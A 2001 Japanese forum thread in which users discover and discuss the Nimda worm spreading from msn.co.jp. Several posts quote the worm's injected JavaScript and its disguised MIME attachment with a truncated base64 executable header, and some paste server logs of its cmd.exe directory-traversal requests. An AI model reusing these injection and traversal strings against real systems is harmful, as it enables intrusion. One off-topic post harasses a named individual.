MSNにウィルス添付？

http://www.msn.co.jp
開くとreadme.exeというなんとも怪しさ全快のファイルがDLするようになってます。
ソースを見ると
最後の一行に
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script
だって。なんじゃこりゃ

変なウィンドウ開くぞ。

漏れは開かないけど

大丈夫でしたよ

　　 ∧∧　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣　　　　　　　
　､_ ( ﾟдﾟ)　＜　怖くてurl踏めないよ。。。。　　　　　　
　 uuuu´　　　＼＿＿_＿＿＿_＿＿＿＿_＿＿＿_＿　　　

┌──┐
│（ﾟдﾟ│
├──┘
│
│

＞このサイトは Microsoft Internet Explorer でご覧ください。
＞Microsoft Internet Explorer をインストールしてください。
＞
＞ここを クリック して Microsoft Internet Explorer をダウンロードしてください。
＞
＞(C) 1997-2000 Microsoft Corporation. All rights reserved. Terms of Use. Privacy Policy.

( ´Д`)y──┛~~なんじゃこりゃー

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAKh+PwEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
AAAABAAAAAAAAAAAEAEAABA

踏んだけど開いてくれねえ

Donut　使ってたから大丈夫だったのかな

( ´Д`)y──┛~~ネスケだけど開いたよ、IMEのツールバーのトコに

VSが立ち上がるんだけどどうなってんのこれ？

あちこちで叩かれまくってる田口乱Ｄの祟り

げ！なんだよ・・・これ・・・(;´Д`)

はきーんぐ！はきーんぐ！！！！！！！！！！！！！！！！

これ、ダウンロードしていいんか？

おいらが見てるＭＳＮには何もないよ？
ソース見たけど。。。

ＩＥで開いたけどなんともならない...
バージョンは　6.00.2462.0000　です
どーして

おいらのIEバージョン5です。WIN2000。
思いっきり開いてくれます

http://www.msn.co.jp/home
ここは開かないみたいですよ。
http://www.msn.co.jp
で確認してみてください。くれぐれも実行しないように（笑

DLしてｳｲﾙｽｽｷｬﾝしたが問題なし。
けど、恐くて実行できない

バグブラじゃ開いてくれねえ

怖いなぁ

１８です

http://www.msn.co.jp
Donut　ＩＥ　共に大丈夫です

何もないよ。

開くよ？なんもDLするような気配無しだけど・・・
なおっちゃった？

げ、、ﾀﾞｳｿしてしまったyo

http://www.msn.co.jp/readme.emlにアクセスすればDLできるよ

indexファイルってことね。

この部分ね。
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

ﾏｶにはかんけーねー話だ

>>20
なるほど、リダイレクト用ページのソースにあるということですね。
たしかに、おっしゃるとおりのスクリプト、確認いたしました。

※確認法、下記のＵＲＬで右クリック＞対象をファイルに保存
そして、保存されたファイルをテキストエディタでご閲覧ください。
http://www.msn.co.jp

しかし、Ｗｉｎ2000＋IE6.00.2462.0000におきまして、当方の環境では
なにも変化なくhomeへリダイレクトされます。

( ´Д`)y──┛~~心配になって、オンラインスキャンしちゃったよ。

http://www.trendmicro.co.jp/hcall/scan.htm

そのファイルをテキストで開くとこの部分だけ読める。

This program cannot be run in DOS mode.

ちなみにウィルスバスター2001/09/15版ではウィルスチェックは大丈夫だね。

>>33
今日更新してるよ＠ウイルスバスター

普通のMSNだけど・・？

>>34
更新したけど大丈夫だった。

これ以上判らん。(;´Д｀)

つか、実行したらexplorer.exeが強制終了した
吃驚したよ

ページまっしろ。
何も起こらん

マックＯＳが立ちあがった！

>>37
ご愁傷様

普通すぎる
踏みてぇぇ〜〜〜〜

ttp://www.msn.co.jp/readme.emlのソース。

<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EA4DMGBP9p height=0 width=0>
</iframe></BODY></HTML>

デコードしてみました。ウイルスですね。
最新のスキャンにも引っかからないので新種ですね。

( ´Д`)y──┛~~IEだと↓
<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EA4DMGBP9p height=0 width=0>
</iframe></BODY></HTML>

ネスケだと（４．７３）>>8

>>43

それでは報告よろしく♪
http://www.qr.cas.uec.ac.jp/~anti/

アップデートできないんだが・・・。

MSNはきーんぐ？

>>43
まぢか？それともネタか？

ＵＲＬ踏んだけど･･･普通のページだ。
何も起こらない場合は、大丈夫なんだよね？
勝手にＤＬって事はないんだよね？

何も起こらないんですけど…

最初真っ白だったけど
Proxomitron
バイパスさせたら普通になった

>>49

意図的に開かないとDLはしないんじゃないかな？？

フツーにブラウザでttp://www.msn.co.jpを見ても、DLは実行されずに
リダイレクトされるんだYO!

おいおい、ﾏｼﾞﾃﾞウイルスなの？
つか、3Dcidでgoogleすると、おんなじようなメールのログばっか引っかかる。

なんなの、これ。

IEのバージョンが５だとDLされるみたいです（？）

>>55
ＩＥ５．５は大丈夫ってこと？

　

ネタじゃ無いです。
57344バイトのバイナリが生成されます。
バイナリの中に送られて来た時のヘッダが入ってるので明らかにウイルスです。
まあ何日かあとにウソかどうか判るでしょう。

>>55

そうなの？そう言えばおいらのは5.50だな。
うーん、他のPCもIE5.50だな。確認するの面倒。ヽ(´ー｀)ノ

どのIEでも実行されないだろ。
2つ目の<HTML>タグが実行される事ってあるのか？

test

っつーか、MSN何も表示されないんだが。

view-source:http://www.msn.co.jp
で最後の一行を見てみましょう。
http://www.msn.co.jp/readme.eml
ここで踏めますよ

しかしあれだな、平時だったら確実に祭り級のネタなのにね。

>>58
( ´Д`)y──┛~~これのコト？↓
Content-ID: <EA4DMGBP9p>

　 ／⌒＼ 　　／￣￣￣￣￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
　（ ・人・ ） ＜　IE5.50だから関係無いなぁ。で、いつかなの？
　｜ ｜ ｜　　＼＿＿＿＿＿＿＿＿＿＿　　　　　　　　　　　　　　　　　　　　　　　　
　（＿_）＿）　　　　　　　　　　　　　　　　　　　

http://www.msn.co.jp/home.htm

ここソースには何もないけど？

( ´Д`)y──┛~~５．０１だよ・・・・・・。（鬱

3Dcid〜はアウトルックがバイナリをHTMLメールに添付する時のヘッダ(らしい)。
良く知らぬが。

IE６だが、そのまま表示されたからセーフだよな？

あ、出た。
でも、IE5.50だから何もおきない。

>>67
過去レス良く読め。

とりあえずセキュ板に報告するか。
最近apacheに変なリクエストが来ると思ったらこいつか〜
MSNを陥れるとはCodeRedを超えたか？ｗ

>>63
普通、自動リンクさせるか？

今見たが・・・ネタか？これはウイルスじゃありません。。。
ＭＳＮがかってにやってるだけ。好きにしてください

しゅうりょ〜

IE5.5以降は二つ目の<html>が実行されない仕様になっているのだろうか？

>>75
たのむ、終了前にﾏｼﾞﾚｽで本トのところを教えてくださいませ。

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000825375

>>76
つーか、普通のブラウザは２つ目の<HTML>は無視するだろう。

最後に↓が付いてますな。MSNに知らせてあげな。
ワシはもう寝る。

</HTML>
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>

仮にはきーんぐしたとしたら、
なぜこんな風二つ目の<HTML>タグを使った書きかたすんのかな？

( ´Д`)y──┛~~てか、Code Biueて何よ？

ここも同様
http://210.150.177.216/
ワームの仕業？

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000824954

俺だけか？
>>63のURLを踏むとメディアプレーヤーが立ち上がる

>>85
↓かのファイルの一部

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

audio/x-wav に反応してるようですね。

MIMEのデコードが上手くいかない(;´Д`)
readme.exeのみのヘッダ教えてﾁｮ

なんかタスクバーにクリックしても開かないウィンドウがあったので、
MSNのサイトと一緒に無理やり閉じましたけど…。
見ただけじゃ感染とかしませんよね？

>>85
( ´Д`)y──┛~~Content-Type: audio/x-wav; が関係あるんじゃ？

てか、セキュ板の解説っつーか、翻訳してくれ。ﾜｹﾜｶﾗﾝ・・・

結局>>63を踏むとどうなるんだ？？

>>81
ウイルスがやってるだけ。追加カキコの方が楽だから。
<html>
本文
</html>
<html>
ウイルス本文
</html>

>>85
Content-Type: audio/x-wav;
name="readme.exe"だと。

と、いうわけでとりあえずは証拠保全命令ですね。
保管してます.....

http://www.msn.co.jp/readme.eml
しばらく待つべし

MSNのチャットで複数の名前で自作自演をしていた鉄ヲタ、ゲートウェイ。
個人売買での支払い踏み倒しやネカマ行為、荒らし行為を繰り返して逃走、
さらにはオフ会すっぽかしなど数々の伝説を持つヒッキーです。

・ベンチャービジネスで一儲けした
・愛車はホンダのＮＳＸ２台（あわせて2000万円）
・結婚しました。お祝いよろしく♪

などと嘘で身を固めていたものの、実のところはデブの鉄ヲタ専門学生ということが判明。
現在は「ＣＯＷ（カウ）」と名を変えて害悪巣に潜伏しています。
ちなみに壁紙は深キョンの画像貼りまくり．．．．

http://withu.gaiax.com/home/cow66

とりあえずウィルススキャンしても、何も無かったが・・・

メリッサと出たが

なーんだIIS入れてなかったからexplorerが落ちただけで済んだのか。

とりあえず、MSNに質問メール投げてみた。

>>86
いきなり立ち上がったからグロ動画とかでも出てくるのかと思って
速攻で消したんだけど、ただ立ち上がるだけなの？

http://windowsxp.msn.co.jp/column/infomation.htm

http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

↑同様の現象
なんとかしてくれ。。。。うちの回線悪化させやがって！

おかしい？

readme.exeをテキストエディタで開いてみろ！
レジストリのパスらしき文字列がある！
↓
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0

また中国人かよ・・・

2000の方がIE5.01だったようで、MSN逝ったらメディアプレイヤーが開いた。
・・・とりあえずアップデートしとくか・・・

>>102
うわ…。

何も起こらないんですが…
皆さん､何を､どうやってるんですか?

そろそろ結論がでそうですな…
MSNの厨房スタッフがCodeRED(BLUE?)を実行、
ウィルス感染しているという状態ですか。

祭りか？

>>107
過去レス読め。

チャンコロは氏ね

>>108
これってCodeRedなん？

( ´Д`)y──┛~~Code RedってNTとか２Kだっけ？感染するの？

>>113
IISサーバ。

>>113
IISの入っているNTと２K

( ´Д`)y──┛~~９５だから関係ないか・・・・・ﾖｶｯﾀ(ﾎｯ

>>114
ｹｺｰﾝしYO!

CodeRedってdefault.idaを叩いて感染だよね？

M$さいこー

うちにきた第1号
210.118.236.231 - - [18/Sep/2001:22:26:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 397 "-" "-"
以下延々と同様のログが続く・・・

９８はどうなの？
code redは９８関係なかったみたいだけど･･･
今回のは？？

どっかの保険会社がIIS使ってるNTServerだけ保険料値上げしたらしいが
納得であるな。未だにIIS使ってる糞あどみんは逝ってよし！
しかしMSNって日本でYAHOOに続いてアクセス多いんじゃないか？
わけわからん初心者がまた多く感染しちゃうんだろうなぁ。

>>110 私､50でカキコしたものなんですが…
msn逝っても､何にもならないんです｡いつものページなんですけど｡

情報認識不足

>>120
CodeRedじゃないじゃん…。
新種か？

http://www.msn.co.jp/home.htm
ここもヤヴァイんですか？
Homeに設定してるんですけど。

ラディンのサイバーテロ

突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの
スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;

>>128
うへ…。
人柱age

>>123
IEのセキュリティを全部無効にしてから
逝ってみそ

リダイレクト用ページのソースにあるということです。

※確認法、下記のＵＲＬで右クリック＞対象をファイルに保存
そして、保存されたファイルをテキストエディタでご閲覧ください。
http://www.msn.co.jp

※
http://www.msn.co.jp/home.htm
には、問題ありません。

>>128
大丈夫？LANも同時進行って、イントラネットで一人感染したら全員に
行き渡る可能性もある？

参考
http://memo.st.ryukoku.ac.jp/archive/200109.month/thread.html

>>128
とりあえず詳細きぼーん。

セキュリティ板とかの知識ある人呼べるかな？

なんでもなかったぞ？
ウイルスバスターって、入れてるんだけど、、開くのは開いちゃうの？

readme.exe実行しちゃった。
どうなるの？

>>131
テキストエディタって何ですか？

ウィルスの確立９０％以上と見た。
しかも、新種。
パターンファイル更新しても検出出来んもんな〜。

どんな悪さするかわからんから、素人は手を出しちゃ
ダメだよ。

２〜３日後には大騒ぎかもしれん。
って、その頃は戦争始まっているからそれどころじゃないか・・。

>>133
さんくす

実行はしてないけど・・・・問題はあるのかな？(;´Д｀)

>>128
よ！人柱の鏡！

コレもテロなのかい？

>>137
メモ帳等で開くと、プログラムの中のメッセージとかが見れるんだよ。
でも、間違って実行しないようにしないと・・・。

興味本位で試してみたらHDDがガヤガヤうるさくなったんで、焦って
再起動した。デスクトップ、リブレット両方ともデスクトップに*.dllが生成
されていたのが気になったよ。検索で*.emlかけて7000くらいヒット(^^;
ファイル名は数字の羅列となぜか仕事などで作成したファイル名がついて
いた。まぁ、とくに問題ないみたい

CodeRedなら
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067

23:50現在、6,7箇所からアクセスがありました。
かなりの勢いで広まっている可能性がありますので、IISの方は注意された方が
いいかもしれません。

対策されたみたいです。もう開きませんね

昨日バックアップとったばっかりだ・・・ホッ

( ´Д`)y──┛~~９５には感染しないことを願う・・・・。

ﾀﾞｯﾃ ﾘｶﾊﾞﾘｰﾉCDROMﾓｯﾃﾅｲｼ

>>143
ｱﾘｶﾞﾄ

http://memo.st.ryukoku.ac.jp/archive/200109.month/1201.html　より引用。



Windows版Internet Explorerをお使いの方は、MS01-020のパッチをあてずに、
不用意に見に行くと、見に行っただけで自動的に「readme.exe」が実行されて
しまうおそれがある…かもしれないので注意が必要かと。

え、今行こうと思ってたのに。閉鎖？

うぅ、明日学校のアクセスログ見るの楽しみだ（藁

１０：３０頃、ＭＳＮ行った後、画面が真っ白になって
急に動かなくなったんですけど、これってやばいんですか？
その後も動きが鈍くなり、何回も強制終了したんですけど。
ど素人なもんで。心配です。

うわ！
サーバのログ見たらガンガン送ってきてるよ

てかMSN Messenger Servisてのが起動毎にシステムトレイに陣取ってんだけど
どうにかなんない？

ちなみに、msn.or.jp見に行っただけで勝手にダウンロードされた。まぁ、
遊び用のPCだからいいものの、仕事でもつかうPCなら用心されたし。

</HTML>
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>

消えたね

>>155
チェック外せよ……

>>155
プロパいじくれ

MSNほどのデカブツにウィルスなんてマジでテロか？

>>153
変種か新種のウィルスの可能性が高いので、どんな事を行うかは不明・・・。
必要なファイルをFD等に保管しておいた方が良いと思われ。

ノートンアンチウィルスを入れてるけど、何も警告サインは出なかったよ。
一応、ウィルススキャンをしておくかな。

>>130-131 ありがとうございます。

apacheは大丈夫だよね？ちょっと不安だったり。

＞不用意に見に行くと、見に行っただけで自動的に「readme.exe」が実行されて
＞しまうおそれがある…かもしれないので注意が必要かと。

不用意に見に行った。(;´Д｀)

>>155
Serviceな。msconfigでスタートアップからはずす。

で、どおなんの？
ホームがMSNだったから、たぶん幾度となく被爆してるとおもうんだけど、、
そーいえば、最近、とても接続が悪いし、ダウンロードもうまくいかない。
ウイルスのせいか？

日本を狙い撃ちですか？

>>153
emlファイル探せ。
大量にあったら感染なので今日のところは電源落とせ。
明日になればtrendmicroなんかで対処できるだろうから。

該当バグ。IE5.5と5.01だけらしいです。それ以前以後のIEやネスケには無関係(らしい)
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

詳細はここで。

http://memo.st.ryukoku.ac.jp/archive/200109.month/1192.html

>>165
残念賞・

61.207.x.x - - [19/Sep/2001:00:57:42 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.1" 404 257
61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.1" 404 255
61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 265
61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 265
61.207.x.x - - [19/Sep/2001:00:57:43 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 209
61.207.x.x - - [19/Sep/2001:00:57:44 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 209
61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /sc?/c+dir HTTP/1.1" 404 218
61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 209
61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 209
61.207.x.x - - [19/Sep/2001:00:57:45 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
61.207.x.x - - [19/Sep/2001:00:57:46 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 218

3回も見にいったが・・・
全部開かないか、バグブラウザのエラーで止まるか、どちらか
今のところ何も異常なし
ＤＬはされなかったようだ

うちはIE4.0＆ネスケなので助かった。

>>160
MSが好きで食らってんだからいいんだよ。

>>173
同一人物から何種類も？

>>174
あと1歩で賞。

いつからだったんよ？
昨日はなんでもなかったの？

>>176
なるほど

なかなか面白いね。
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
こんな文字列入ってるし

MAIL FROM: < HELO aabbcc -dontrunold NULL
\readme*.exe admin.dll qusery9bnow -qusery9bnow
\mmc.exe \riched20.dll boot Shell explorer.exe
load.exe -dontrunold \system.ini \load.exe \\ octet
これはなんだろ。リッチやexplorerのがいしゅつの手法かな？

>>177
さっき書いたのプラス２行で１度に１６種類のパケットが送られてくる

>>179
うちのサーバのログからだと、昨日は何とも無い。
今日から、>>173と同様なログが記録されている。

>>161,169
ありがとう！emlファイルって何だろう。すみません…。

>>179
今晩10時前後から。
すごい勢いで広まってるっぽい。

クラッカー注意報＠超未確認情報
http://people.site.ne.jp/HTTP_REFERER/index.html

>>184
スタートメニューから「ファイルの検索」で「*.eml」を検索。

>>185
げ！ほんとだ。。手当たり次第にページ開けてみたら当たった(^^;
あーあ。こりゃ明日は酷い事になるぞ。。

>>183
>>185
ｻﾝｸｽｺ

とりあえず、実行してみました。＞＜

とりあえず、明日は大変な日になりそうですなぁ＞ＭＳ

>>186
つーか、これはクラックなのか？専門家の意見きぼん

なんかさっきからZoneAlarmが頻繁に検知し始めたんだけど、関係あるかな？

とりあえず、半角板に貼っておけｗ

>>193
叩かれてるね。
Win98なら問題ないし、普通ならNTや2000でも問題ない。
WEBサーバをIISで立ててる場合だけみたい。

当方IE5.00
TemporaryInternetのフォルダにreadme.emlが・・・・
悪さはしてない”みたい”だが・・・

とりあえずWINバンにも立てといた

専門家じゃないが、新種のワームの可能性が極大だと思われ。

　　　　　 　 ∫　　　　　　　　　　　　　　　　　　　　　　　　
　　　∧,,∧ ∬　　　　 　 ／￣￣￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
　　 ミ,,ﾟДﾟノ,っ━~　　＜　いやー、msnに逝ってなくてよかったよ。　　　　　　　　　　　　　　　　　　
＿と~,,,　　~,,,ﾉ＿.　∀　　＼＿＿＿＿＿＿＿＿＿　　　　　　　　　　　　　　　　　　　　　　　　
　　　 .ﾐ,,,/~),　　.|　┷┳━　　　　　　　　　　　　　　　　　　　　　　　　
￣￣￣ .し'J￣￣|...　┃　　　　　　　　　　　　　　　　　　　　　　　　
￣￣￣￣￣￣￣ 　 .┻

>>183

[18/Sep/2001:23:55:53 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
以下15行つづく

うちのとこもきてたよ！

>>196
readme.exeを実行しなければ大丈夫。
readme.emlはexeをダウンロードさせるためのスクリプトだかHTMLだか。

ん？emlってエミュファイルですか？
実行していいんですよね？

>>199
同意

新種でしょうね。続きはセキュ板でどうぞ。
＃あっちだと初心者は相手にされないかもー

とにかく触らぬウィルスに祟りなし

　　　∧∧　　　>>193　　　　　　　　　　　　　　　　　　　　　
　　　(=ﾟωﾟ)ﾉ　オイラのところにもガンガンやってきてるょぅ
　〜（　　x）　　　　　　　　　　　　　　　　　　　　　　　　
　　　U U　

自分が感染していないだけで安心しちゃいかんよ。
ここ数時間、CodeRed以上のトラフィックかけまくっている
ようだから、インターネットに大きな影響が出る可能性が
あると思われ。

＞叩かれてるね。
＞Win98なら問題ないし、普通ならNTや2000でも問題ない。
＞WEBサーバをIISで立ててる場合だけみたい。

ありがとうございます。つまち.emlファイルが大量に作成されるのは
普通のuserにはありえないということですか？それとも感染はするが
よそ様に迷惑はかけないということですか？

>>202
辺見エミリファイルです( ﾟдﾟ) ﾃﾙﾋｺｯ!

関連な。
http://isweb27.infoseek.co.jp/computer/zaddik/

おいおい！！メールチェックしたらどっさり変なもんが！！！

>>211
どんなの？って落とせないか？(;´Д｀)

.emlファイルを甘く見ちゃダメよ。
ウィルスが一緒にエンコードされている可能性あるから。

試したいなら、OutlookExpressに放り込んで見るとわかるYO!

新着メッセージなし。。。
これは、これで、悲しい。

>>214
俺も。。。。

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
だそうです。新作ですね。

>>215
俺も

.emlってファイルが幾つかあるんだけど･･･
やばいのかな？？？
スタート→ファイルの検索で。
mpeg系ファイルに多く見られるんだけど･･･。
だれか、マジレスお願いします！！

>>216
中国産ですね。松茸のシーズンかぁ。

>>217
俺も。。。

漏れのHDDには*.emlファイルなんて無かったYO！

漏れも新着無し。

メル来ないどうしでメル友になるか？（藁

で、MSN側からのアナウンスはまだないの？

>>216
その文字列は激しくガイシュツ。

問題はその中身。。

メールか… 14日から1通も来てないな…

１のアドレスを踏んでしまったらアウトですか？

>>１８７
emlやってみましたが
何も見つからなかったです。大丈夫なのかな。
２チャン初めて書きこみしたんだけど
みんなやさしくって良かった。

1.鯖に対して何をするのか。
2.readme.exeが端末に対して何をするのか。

>>214
漏れなんて小泉首相からメール来るんだぞ〜・・・・・・ﾊﾊﾊ・・・ﾊｧ・・・

>>158
>>159
>>166
ありがとうございます。
よく分かんなかったんで結局アンインストールしちゃいました。
お騒がせでした。

( ´Д`)y──┛~~メールは来てないけど、*.eml で検索したら
Mvqkj05d.emlｔってOEのメールが出てきた

>>225
(´д`)同情で同上

これを書き込んだときと同時に1とほぼ同じ内容のメールをMSNに送っといたけど返事ないな。

>>226
readme.exeファイルが自分のHDDに無ければ大丈夫と思われ・・

|　　　　　／⌒彡　ゴーーーー　　　　　　　　　　　　　　　　　　　　　　　
|　　　　 /　冫、）　　　　　　　　　　　　　　　　　　　　　　　　
|　　　　/　 ` ／　　　　　　　　　　　　　　　　　　　　　　　　
|　　　 /　　/ 　　みんなの心に感謝します〜
|　　 ＠─＠　

>233
これ→このスレ

世界規模で増殖中です　←　マジ
かなりやばそうです
テロ関連かわかりませんが明日のニュースを賑わすでしょう

>>214 >>215 >>217 >>220 おれもﾀﾞﾖｰ
>>222 ｲｲﾈ!

祭りだあ！！祭りだあ！！祭りだあ！！

>>222
俺も。。。

>>214
すまん、俺もだ・・

emlファイルが数千単位で大増殖するという報告があるから
HDDが普段と違ってやたらガリガリ言ってる人とかは要注意。

秀ちゃん見てる？

気にするな！ワシもだ！！ｗ

>>240
( ´Д`)y──┛~~ﾓﾚﾓﾅｰ トロメールしかこない（ｗ

emlファイルが１つだけあるんですが大丈夫ですか？

240も241もみんな友達だ！！

>>２４２
HDDって？ウィーンってやつですか？

>>246
実行してみたら？
もし、ｳｲﾙｽだったら汚いから近寄らないでね彡☆

>>246どこに？

うちのサイトにも>>173みたいなアタックが・・・
ほとんど216.*.*.*だが。メンテができねー。
tcupの本体と一部サーバーが氏んでいるのはこのせいか？

もし、インターネットにつながらなかったり、非常に遅くなっていたりしても
ISPや自社のネット管理者をいじめない様に！

インターネット上に異常なトラフィックが増えまくっているので。
CodeRedのログが隠れてしまうくらいに、新種のログが・・・・

50megs.comから16通ほどメールが来た( ´Д`)y──┛~

おいらもZA反応しまくってる。。。。。その先に飛んだら、DLのダイアログが立ち上がった。。。(;´Д｀)

>>243
誤爆か？

>>214僕もだ・・・。

ここに「メール来ない大同盟」が結成された模様。

>>255
まさか、ﾗﾃﾞｨｿ通信・・・

( ´Д`)y──┛~~emlファイルネスケのキャッシュにあったよ

俺なんかNBCiから600通のメールボムくらったぞ

>>254
　 ∧∧　　　　どうしようかねえ・・・。
　 (;=ﾟωﾟ)ﾉ　　　
〜(⊃OO　

>>214
俺も。。。。

便乗テロの可能性あり

http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]

>>260
漏れもそれ位メールが欲しいなぁ（ﾜﾗ

260はＭＶＰ

今回のはNimdaと命名された模様…。

http://www.msn.co.jp/home.htm
ここもいつかやられる？

　

>>254
ここ↓？
216.**.**.**
63.**.**.*

*.emlってファイル検索の名前に入れるんですか？
それとも、含まれる文字列の方ですか？

>>242
それ、俺。
アイコンはアウトルックや、MS_エクソチェンジのメールの形だ<*.eml
(*.msgと同じやつね)

>>267
韓国っぽい名前だなーンミダ

http://61.213.*.*/

ここも感染してる。

>>271
ファイル検索の名前に入れる

>>210
のとこのemlファイルふんでみたけど大丈夫だった。
たぶん、IE5.5SP2入れてるなら大丈夫じゃないかな。
みんな入れてる？

しっかし、このリダイレクト用サーバー、以前にもクラック
受けてなかったっけ？
だれか、覚えていませんか？

やぱり、メールきません。。。
みんな、なかよくしようよ。

\Windows\TempファイルにへんなmepE280.tmp.exeというファイルがいて、
何か送ろうとしている。(\NortonInernetSecurityで遮断中)
別にIISも利用していない普通のWin98．
木馬か？

symantecのサイトの情報だと、このワームの動きは、

１．readme.exeを添付したメールを出す。
２．C:ドライブに共有設定をする

まあ、余り凶悪なヤツではないようだ。

>>276
SP2入れてたら平気なの？

>>214
君は友達だよ！！

>>282ありがと。。。

歌おう！！みんなで歌おう！！それっ

「ぼっくらは〜みんな〜いきている〜
いき〜ているから、さみしんだ。。。」

俺だって差出人が個人名のメールは来ないさ・・・

＞＞214
うたっちゃダメ〜。

・・・・・・・・・・・・・泣いちゃうでしょ・

ＭＳＮ開いたら、真っ白なページが出たんで
すぐに閉じたんですが・・・
コレはやばいのでしょうか？？？
*.emlで検索したらＯＥのファイルが一つ・・・。
誰かマジレスください、お願いします。

・・・、
そして、、、ここでも、、ともだちを失った。。。

↓ここも感染している。間違えて開くなよ。
ttp://help.msn.co.jp/maintenance.htm

このスレがほとんど意味わかんない僕は
とりあえず>>205でいいんですよね？

( ´Д`)y──┛~~とりあえず、http://www.toromail.comに登録しとき
毎日１通癒しのメールが届くぞ（ｗ

>>287
２ｃｈで友達を作る事は　WTCビルを破壊する事より難しい　ｂｙひろ○き

>>214

違う！違うのよ。・・・ただ歌ったら涙が・・・・・

私たちは友達よ！！

Netscapeはみれない
IEをインストールしろ
というがめんがでた
さすが
世界のMICROSOFT

>286
テキストエディタで開いて、つぎのような感じなら即削除っす。

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

>>280
symantecのどこにそれ書いてあるの？
トップみてものってないんだけど。
http://www.symantec.co.jp/
であってるよね？

>>286
readme.emlやreadme.exeファイルがあったら削除して、
マシンを再起動せよ。

俺はメール来たぜ、１２通・・・・・・・・・・・・・・・・・・・・メルマガと広告じゃなーか・・・。

>>286
( ´Д`)y──┛~~オレも同じだったが、キャッシュの削除
emlファイルをtxtに名前変えて保存しといたよ

>>290
それでも、こんな悲しいことがあるらしい↓

過日、8月27日・28日・29日・30日にサーバーの不具合が発生し
